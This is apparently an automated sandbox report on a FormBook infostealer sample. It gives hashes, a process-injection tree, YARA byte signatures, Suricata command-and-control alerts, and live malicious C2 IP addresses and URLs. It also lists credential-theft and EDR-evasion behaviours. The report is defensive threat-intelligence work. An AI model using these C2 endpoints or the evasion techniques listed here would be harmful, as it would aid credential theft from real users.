

Windows Analysis Report
xBzBOQwywT.exe

Overview

General Information

Sample name: xBzBOQwywT.exe (renamed because original name is a hash value)
Original sample name: 648cf23613834f4fba89ced0a881139a1883bf00c1c12172fbc7ee53a143e5ef.exe
Analysis ID: 1551188
MD5: 715ec2a53173921888b38c9731ad9bc9
SHA1: 710e6e31cbee07deb127ac9b70a4b1a31cc498f3
SHA256: 648cf23613834f4fba89ced0a881139a1883bf00c1c12172fbc7ee53a143e5ef
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • xBzBOQwywT.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\xBzBOQwywT.exe" MD5: 715EC2A53173921888B38C9731AD9BC9)
    • svchost.exe (PID: 4360 cmdline: "C:\Users\user\Desktop\xBzBOQwywT.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • IpIaYUETnYWFH.exe (PID: 5368 cmdline: "C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RpcPing.exe (PID: 2508 cmdline: "C:\Windows\SysWOW64\RpcPing.exe" MD5: F7DD5764D96A988F0CF9DD4813751473)
          • IpIaYUETnYWFH.exe (PID: 5284 cmdline: "C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 348 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.3367695283.0000000004CE0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3367695283.0000000004CE0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x3688a:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1e919:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2c010:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1409f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1804925513.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e423:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x164b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f223:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\xBzBOQwywT.exe", CommandLine: "C:\Users\user\Desktop\xBzBOQwywT.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\xBzBOQwywT.exe", ParentImage: C:\Users\user\Desktop\xBzBOQwywT.exe, ParentProcessId: 7092, ParentProcessName: xBzBOQwywT.exe, ProcessCommandLine: "C:\Users\user\Desktop\xBzBOQwywT.exe", ProcessId: 4360, ProcessName: svchost.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\xBzBOQwywT.exe", CommandLine: "C:\Users\user\Desktop\xBzBOQwywT.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\xBzBOQwywT.exe", ParentImage: C:\Users\user\Desktop\xBzBOQwywT.exe, ParentProcessId: 7092, ParentProcessName: xBzBOQwywT.exe, ProcessCommandLine: "C:\Users\user\Desktop\xBzBOQwywT.exe", ProcessId: 4360, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-07T15:27:11.595847+0100 | 2022930 | 1 | A Network Trojan was detected | 4.175.87.197 | 443 | 192.168.2.8 | 49704 | TCP
2024-11-07T15:27:50.811528+0100 | 2022930 | 1 | A Network Trojan was detected | 4.175.87.197 | 443 | 192.168.2.8 | 49711 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-07T15:27:37.582756+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49710 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:00.989412+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49715 | 74.208.236.25 | 80 | TCP
2024-11-07T15:28:14.389343+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49775 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:27.776036+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49851 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:55.479688+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49993 | 3.33.130.190 | 80 | TCP
2024-11-07T15:29:09.004729+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49997 | 199.192.19.19 | 80 | TCP
2024-11-07T15:29:23.075547+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 50001 | 208.91.197.27 | 80 | TCP
2024-11-07T15:29:44.886986+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 50005 | 156.242.132.82 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-07T15:27:37.582756+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:00.989412+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49715 | 74.208.236.25 | 80 | TCP
2024-11-07T15:28:14.389343+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49775 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:27.776036+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49851 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:55.479688+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49993 | 3.33.130.190 | 80 | TCP
2024-11-07T15:29:09.004729+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49997 | 199.192.19.19 | 80 | TCP
2024-11-07T15:29:23.075547+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 50001 | 208.91.197.27 | 80 | TCP
2024-11-07T15:29:44.886986+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 50005 | 156.242.132.82 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-07T15:27:53.493743+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49712 | 74.208.236.25 | 80 | TCP
2024-11-07T15:27:55.903448+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49713 | 74.208.236.25 | 80 | TCP
2024-11-07T15:27:58.408291+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49714 | 74.208.236.25 | 80 | TCP
2024-11-07T15:28:06.681366+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49727 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:09.292827+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49742 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:11.773840+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49758 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:20.067997+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49807 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:22.624290+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49822 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:25.156568+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49838 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:47.802064+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49955 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:50.411846+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49969 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:52.899048+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49981 | 3.33.130.190 | 80 | TCP
2024-11-07T15:29:01.378338+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49994 | 199.192.19.19 | 80 | TCP
2024-11-07T15:29:03.932155+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49995 | 199.192.19.19 | 80 | TCP
2024-11-07T15:29:06.449463+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49996 | 199.192.19.19 | 80 | TCP
2024-11-07T15:29:14.989019+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49998 | 208.91.197.27 | 80 | TCP
2024-11-07T15:29:17.523090+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49999 | 208.91.197.27 | 80 | TCP
2024-11-07T15:29:20.065290+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 50000 | 208.91.197.27 | 80 | TCP
2024-11-07T15:29:29.814343+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 50002 | 156.242.132.82 | 80 | TCP
2024-11-07T15:29:32.709103+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 50003 | 156.242.132.82 | 80 | TCP
2024-11-07T15:29:35.365443+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 50004 | 156.242.132.82 | 80 | TCP
2024-11-07T15:29:58.903671+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 50006 | 84.32.84.32 | 80 | TCP
2024-11-07T15:30:02.614463+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 50007 | 84.32.84.32 | 80 | TCP

AV Detection

Source: xBzBOQwywT.exe, Avira: detected
Source: http://www.promasterev.shop/abrg/, Avira URL Cloud: Label: malware
Source: http://www.falconclub.online/sld7/, Avira URL Cloud: Label: malware
Source: http://www.promasterev.shop/abrg/?F2=GnAJmiRPPiyH2TmfuBVnsZoXdGf0FUPFySgQhtVOM4GwnDq9Dnvh9ePCWYtJxLLAU+yG0d2c2V85YMiF3u+CXoS/lp19JNeFf5Feq2s9J88WlfAexgO/UytfAJO4SOXJGQ==&sHS=543hApwHD, Avira URL Cloud: Label: malware
Source: http://www.falconclub.online/sld7/?F2=/serfU6kaxhlkkJx8dOr0qlSRXA+6La0KEB68G6jbYfyT6z2zvVJBFhkOYA104kn6FRHm7lAc7gn2TRu9DlzyIrvo6u+6+g1Ilwo5dhHoQBd/NfHtrD7TOfEhTSvK6UN8A==&sHS=543hApwHD, Avira URL Cloud: Label: malware
Source: xBzBOQwywT.exe, ReversingLabs: Detection: 71%
Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000006.00000002.3367695283.0000000004CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1804925513.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.3365351743.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1809587289.00000000056F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.3360236201.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1808701497.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.3365349150.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: xBzBOQwywT.exe, Joe Sandbox ML: detected
Source: xBzBOQwywT.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IpIaYUETnYWFH.exe, 00000004.00000000.1729593052.0000000000A0E000.00000002.00000001.01000000.00000005.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3364160593.0000000000A0E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: xBzBOQwywT.exe, 00000000.00000003.1592526943.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, xBzBOQwywT.exe, 00000000.00000003.1591484081.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1806399364.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1715532753.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1806399364.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1713483766.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3365897202.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1810471522.0000000000B94000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3365897202.00000000030EE000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1804899051.00000000009E7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdbGCTL source: svchost.exe, 00000002.00000003.1772438382.0000000002C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1772421164.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000004.00000003.2058526696.0000000000C5B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: xBzBOQwywT.exe, 00000000.00000003.1592526943.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, xBzBOQwywT.exe, 00000000.00000003.1591484081.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1806399364.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1715532753.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1806399364.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1713483766.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000005.00000002.3365897202.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1810471522.0000000000B94000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3365897202.00000000030EE000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1804899051.00000000009E7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdb source: svchost.exe, 00000002.00000003.1772438382.0000000002C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1772421164.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000004.00000003.2058526696.0000000000C5B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: RpcPing.exe, 00000005.00000002.3367266886.000000000357C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3361983815.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000000.1874660765.00000000028AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2101667197.000000002D4CC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: RpcPing.exe, 00000005.00000002.3367266886.000000000357C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3361983815.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000000.1874660765.00000000028AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2101667197.000000002D4CC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\xBzBOQwywT.exe, Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
Source: C:\Users\user\Desktop\xBzBOQwywT.exe, Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
Source: C:\Users\user\Desktop\xBzBOQwywT.exe, Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
Source: C:\Users\user\Desktop\xBzBOQwywT.exe, Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
Source: C:\Users\user\Desktop\xBzBOQwywT.exe, Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
Source: C:\Users\user\Desktop\xBzBOQwywT.exe, Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
Source: C:\Users\user\Desktop\xBzBOQwywT.exe, Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
Source: C:\Users\user\Desktop\xBzBOQwywT.exe, Code function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
Source: C:\Users\user\Desktop\xBzBOQwywT.exe, Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
Source: C:\Windows\SysWOW64\RpcPing.exe, Code function: 5_2_004EC4E0 FindFirstFileW,FindNextFileW,FindClose,5_2_004EC4E0
Source: C:\Windows\SysWOW64\RpcPing.exe, Code function: 4x nop then xor eax, eax, 5_2_004D9B20
Source: C:\Windows\SysWOW64\RpcPing.exe, Code function: 4x nop then mov ebx, 00000004h, 5_2_00AE04E8

Networking

Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49710 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49727 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49742 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49710 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49712 -> 74.208.236.25:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49713 -> 74.208.236.25:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49715 -> 74.208.236.25:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49715 -> 74.208.236.25:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49714 -> 74.208.236.25:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49807 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49822 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49838 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49851 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49851 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49758 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49775 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49775 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49955 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49981 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49993 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49993 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50000 -> 208.91.197.27:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49998 -> 208.91.197.27:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49995 -> 199.192.19.19:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49994 -> 199.192.19.19:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49999 -> 208.91.197.27:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:50001 -> 208.91.197.27:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50001 -> 208.91.197.27:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49969 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49997 -> 199.192.19.19:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49997 -> 199.192.19.19:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49996 -> 199.192.19.19:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50003 -> 156.242.132.82:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50002 -> 156.242.132.82:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50004 -> 156.242.132.82:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:50005 -> 156.242.132.82:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50005 -> 156.242.132.82:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50006 -> 84.32.84.32:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50007 -> 84.32.84.32:80
Source: DNS query: www.animekuid.xyz (6 queries)
Source: DNS query: www.demovix.xyz
Source: Joe Sandbox View, IP Address: 156.242.132.82
